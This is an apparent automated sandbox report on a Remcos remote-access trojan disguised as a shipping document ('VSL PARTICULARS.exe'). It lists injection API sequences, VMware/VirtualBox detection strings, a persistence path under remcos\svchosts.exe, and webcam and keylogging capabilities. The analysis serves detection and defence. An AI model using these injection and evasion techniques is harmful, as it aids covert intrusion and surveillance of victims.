          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_004057B6 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,17_2_004057B6
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_0040BEA2 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?17_2_0040BEA2
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, svchosts.exe, 00000016.00000002.388465248.0000000003024000.00000004.00000001.sdmp, svchosts.exe, 00000017.00000002.407164584.0000000002EC4000.00000004.00000001.sdmp, svchosts.exe, 00000019.00000002.421492633.0000000002A84000.00000004.00000001.sdmp, svchosts.exe, 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, svchosts.exe, 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, svchosts.exe, 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
          Source: svchosts.exe, 00000019.00000002.421463243.0000000002A6A000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
          Source: svchosts.exe, 00000019.00000002.421463243.0000000002A6A000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: svchosts.exe, 00000019.00000002.421463243.0000000002A6A000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: svchosts.exe, 00000019.00000002.421463243.0000000002A6A000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: svchosts.exe, 00000019.00000002.421463243.0000000002A6A000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: svchosts.exe, 00000019.00000002.421463243.0000000002A6A000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: svchosts.exe, 00000019.00000002.421463243.0000000002A6A000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: svchosts.exe, 00000019.00000002.421463243.0000000002A6A000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: svchosts.exe, 00000019.00000002.421463243.0000000002A6A000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.296655049.000000000271B000.00000004.00000001.sdmp, MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, svchosts.exe, 00000016.00000002.388465248.0000000003024000.00000004.00000001.sdmp, svchosts.exe, 00000017.00000002.407164584.0000000002EC4000.00000004.00000001.sdmp, svchosts.exe, 00000019.00000002.421492633.0000000002A84000.00000004.00000001.sdmp, svchosts.exe, 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, svchosts.exe, 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, svchosts.exe, 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmpBinary or memory string: @HARDWARE\ACPI\DSDT\VBOX__PROCMON_WINDOW_CLASSPROCEXPL21invalid vector<T> subscript?playaudiodatafmt WAVERIFF.wav%Y-%m-%d %H.%MgetcamsingleframenocamerastartcamcapclosecamgetcamframeinitcamcapFreeFrameGetFrameCloseCameraOpenCameracamdlldatacamframe|dmc|[DataStart][DataStart]0000%02i:%02i:%02i:%03i [KeepAlive] Enabled! (Timeout: %i seconds)
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_00407D38 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,17_2_00407D38
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_004011A3 mov eax, dword ptr fs:[00000030h]17_2_004011A3
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Contains functionality to inject code into remote processesShow sources
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_0040D477 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,17_2_0040D477
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeMemory written: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeMemory written: C:\Users\user\AppData\Roaming\remcos\svchosts.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeMemory written: C:\Users\user\AppData\Roaming\remcos\svchosts.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeMemory written: C:\Users\user\AppData\Roaming\remcos\svchosts.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess created: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe {path}Jump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\install.bat' 'Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE PING 127.0.0.1 -n 2 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe 'C:\Users\user\AppData\Roaming\remcos\svchosts.exe' Jump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe {path}Jump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe {path}Jump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe {path}Jump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe {path}Jump to behavior
          Source: svchosts.exe, 0000001F.00000002.474670828.0000000001630000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: svchosts.exe, 0000001F.00000002.474670828.0000000001630000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: svchosts.exe, 0000001F.00000002.474670828.0000000001630000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: svchosts.exe, 0000001F.00000002.476505201.0000000002C35000.00000004.00000040.sdmpBinary or memory string: Program Manager,:
          Source: svchosts.exe, 0000001F.00000002.475378814.0000000002B7D000.00000004.00000001.sdmp, logs.dat.31.drBinary or memory string: [ Program Manager ]
          Source: svchosts.exe, 0000001F.00000002.476505201.0000000002C35000.00000004.00000040.sdmpBinary or memory string: Program ManagerpData\Roaming\
          Source: svchosts.exe, 0000001F.00000002.474670828.0000000001630000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: svchosts.exe, 0000001F.00000002.476505201.0000000002C35000.00000004.00000040.sdmpBinary or memory string: Program ManagerpData\RoamingJ:
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,17_2_0040818A
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
